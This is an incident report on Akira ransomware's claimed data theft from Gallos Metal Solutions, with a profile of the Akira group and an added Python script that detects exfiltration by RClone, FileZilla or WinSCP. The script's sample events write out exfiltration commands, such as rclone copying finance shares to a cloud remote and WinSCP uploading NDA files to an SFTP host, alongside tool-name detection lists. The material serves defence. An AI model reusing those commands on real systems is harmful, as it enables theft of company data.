Gallos Metal Solutions Hit by Akira Ransomware, Data Compromised

Incident Date:

June 27, 2024

Overview

Victim

Gallos Metal Solutions

Attacker

Akira

Location

Milwaukee, Wisconsin, USA

First Reported

June 27, 2024

Ransomware Attack on Gallos Metal Solutions by Akira Group

Overview of Gallos Metal Solutions

Gallos Metal Solutions, Inc., based in Milwaukee, Wisconsin, is a specialized metal heat treating company. Founded in 1974, the company has established itself as a leader in continuous mesh belt atmosphere heat treating. Although it employs only five people, its continuous furnaces allow it to process large volumes of small parts. The company prides itself on precise atmosphere and temperature control, which produces uniform case depths and consistent hardness across parts.

Gallos Metal Solutions serves a diverse range of industries, including construction, automotive, aerospace, and industrial manufacturing. Their services encompass custom metal fabrication, welding, machining, and metal finishing. The company is known for its commitment to quality and customer satisfaction, leveraging advanced technologies and skilled craftsmanship to deliver high-quality metalworking solutions.

Details of the Ransomware Attack

On June 27, 2024, Gallos Metal Solutions was reported as a victim of a ransomware attack by the Akira ransomware group. According to the group's leak-site listing, the attackers took employees' personal files, non-disclosure agreements (NDAs), financial data, and other internal business documents. The volume of data taken has not been disclosed.

Akira claimed responsibility by adding Gallos Metal Solutions to its dark web leak site. The listing is the attacker's own statement: neither the scope of the data nor the date of initial access has been independently confirmed, and the date above is the date the claim became public. Akira operates a double extortion model, stealing data before encrypting systems and then demanding a ransom both for a decryptor and for a promise to delete the stolen data.

Profile of the Akira Ransomware Group

Akira is a relatively new but rapidly growing ransomware family that first emerged in March 2023. The group targets small to medium-sized businesses across sectors including manufacturing, technology, education, and telecommunications. Researchers have linked Akira to the now-defunct Conti ransomware gang because its code overlaps with Conti's.

Akira's ransom demands typically range from $200,000 to over $4 million. The group distinguishes itself with a dark web leak site styled as a retro 1980s green-on-black terminal that visitors navigate by typing commands. Akira's intrusions typically begin with unauthorized access to a VPN service, frequently one without multifactor authentication, followed by credential theft and lateral movement before the ransomware is deployed. The group has been observed using RClone, FileZilla, and WinSCP to exfiltrate data.

In April 2023, Akira added a Linux variant targeting VMware ESXi hypervisors to its Windows encryptor. As of January 1, 2024, the group had impacted more than 250 organizations and claimed approximately $42 million in ransom proceeds.

Potential Vulnerabilities and Attack Penetration

No public account of how Akira gained access to Gallos Metal Solutions has been released, so the following is inference from the group's known tradecraft rather than a description of this intrusion. Small manufacturers are a recurring Akira target: they depend on remote access for suppliers and staff, rarely have dedicated security personnel, and run production processes such as continuous heat treating where downtime is immediately costly, which raises the pressure to pay.

Akira's intrusions typically start with valid or stolen credentials against a VPN that lacks multifactor authentication. Once inside, the group harvests further credentials and moves laterally until it can stage the encryptor across the environment. Because exfiltration with RClone, FileZilla, or WinSCP happens before encryption, the appearance of those tools on hosts that have no business running them is one of the last practical opportunities to detect the intrusion before the ransom note appears.
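The detection point in the previous paragraph, worked as an added example that is not part of the original report: a small Python scanner over process-creation events that flags RClone, FileZilla and WinSCP, including a renamed RClone binary identified by its PE version information, and separates a plain execution from a transfer to a configured remote or an explicit FTP/SFTP server. The field names mirror Sysmon Event ID 1 (Image, OriginalFileName, CommandLine, Computer, User); the events themselves are constructed for this example, and the host names, share paths, remote names and the 203.0.113.10 address are placeholders.

```python
"""Flag process-creation events that resemble Akira-style exfiltration with
RClone, FileZilla or WinSCP. Added example; the records below are constructed."""
import json
import re
from pathlib import PureWindowsPath

# Binaries the report names as Akira's exfiltration tooling (plus WinSCP's console front end).
EXFIL_TOOLS = {"rclone.exe", "filezilla.exe", "winscp.exe", "winscp.com"}

# rclone sub-commands that move data off the host.
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}

# A configured rclone remote looks like "name:" or "name:path". At least two characters
# before the colon so a drive letter ("C:\...") is not matched; "scheme://" is excluded
# here because URLs are handled by URL_SCHEME below.
RCLONE_REMOTE = re.compile(r"(?<![\w\\/:])([A-Za-z0-9_-]{2,}):(?!//)\S*")

# WinSCP/FileZilla driven from the command line with an explicit server.
URL_SCHEME = re.compile(r"\b(?:ftp|ftps|sftp|scp|webdav)://[^\s\"']+", re.IGNORECASE)

# Constructed JSON-lines events (hypothetical hosts, paths and remotes).
SAMPLE_EVENTS = r'''
{"Computer": "WS-01", "User": "CORP\\jdoe", "Image": "C:\\Tools\\rclone.exe", "OriginalFileName": "rclone.exe", "CommandLine": "rclone.exe copy C:\\Shares\\Finance mega:finance-dump --transfers 32 -q"}
{"Computer": "WS-02", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\svchost.exe", "OriginalFileName": "svchost.exe", "CommandLine": "svchost.exe -k netsvcs"}
{"Computer": "FS-01", "User": "CORP\\svc_backup", "Image": "C:\\Users\\Public\\updater.exe", "OriginalFileName": "rclone.exe", "CommandLine": "updater.exe sync D:\\HR backup:hr --ignore-existing"}
{"Computer": "WS-03", "User": "CORP\\admin", "Image": "C:\\Program Files (x86)\\WinSCP\\WinSCP.exe", "OriginalFileName": "winscp.exe", "CommandLine": "\"C:\\Program Files (x86)\\WinSCP\\WinSCP.exe\" /command \"open sftp://svc@203.0.113.10/\" \"put C:\\Shares\\NDA /nda/\" \"exit\""}
{"Computer": "WS-01", "User": "CORP\\jdoe", "Image": "C:\\Tools\\rclone.exe", "OriginalFileName": "rclone.exe", "CommandLine": "rclone.exe --version"}
{"Computer": "FS-01", "User": "CORP\\svc_backup", "Image": "C:\\Tools\\rclone.exe", "OriginalFileName": "rclone.exe", "CommandLine": "rclone.exe copy C:\\Shares\\Finance D:\\Backup\\Finance"}
'''


def basename(path):
    """Lower-cased file name of a Windows path ("" if the field is missing)."""
    return PureWindowsPath(path).name.lower() if path else ""


def classify(event):
    """Return the (rule, detail) pairs that fire for one process-creation event."""
    image = basename(event.get("Image"))
    original = (event.get("OriginalFileName") or "").lower()
    cmdline = event.get("CommandLine") or ""
    hits = []
    if image in EXFIL_TOOLS:
        hits.append(("exfil_tool_executed", image))
    elif original in EXFIL_TOOLS:
        # PE version info survives a rename on disk: "updater.exe" that is really rclone.
        hits.append(("renamed_exfil_tool", f"{image} (OriginalFileName={original})"))
    else:
        return hits  # not one of the tools; nothing more to check
    argv = cmdline.split()[1:]  # drop argv[0]; verbs and flags follow
    is_rclone = "rclone.exe" in (image, original)
    if is_rclone and any(a.lower() in RCLONE_VERBS for a in argv) and RCLONE_REMOTE.search(cmdline):
        # A data-moving verb plus a configured remote; a local-to-local copy does not qualify.
        hits.append(("rclone_transfer_to_remote", cmdline))
    m = URL_SCHEME.search(cmdline)
    if m:
        hits.append(("transfer_client_with_remote_url", m.group(0)))
    return hits


def scan(jsonl):
    """Run classify() over JSON-lines events and return flat alert records."""
    alerts = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        for rule, detail in classify(ev):
            alerts.append({"host": ev.get("Computer"), "user": ev.get("User"),
                           "rule": rule, "detail": detail})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a['host']:6} {a['user']:22} {a['rule']:32} {a['detail']}")
```

The renamed-binary rule is the one worth keeping even if the others are tuned down: image-name allow-lists are what attackers expect, while OriginalFileName comes from the PE resource section and is rarely patched out. The local copy on FS-01 deliberately fires only the plain execution rule, which is the case to route to a lower-priority queue than a transfer to a remote.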

Sources:

Recent Ransomware Attacks (RRA), a ransomware tracker that compiles listings from threat actors' leak sites and other trackers; the site states that it cannot guarantee the accuracy of that data.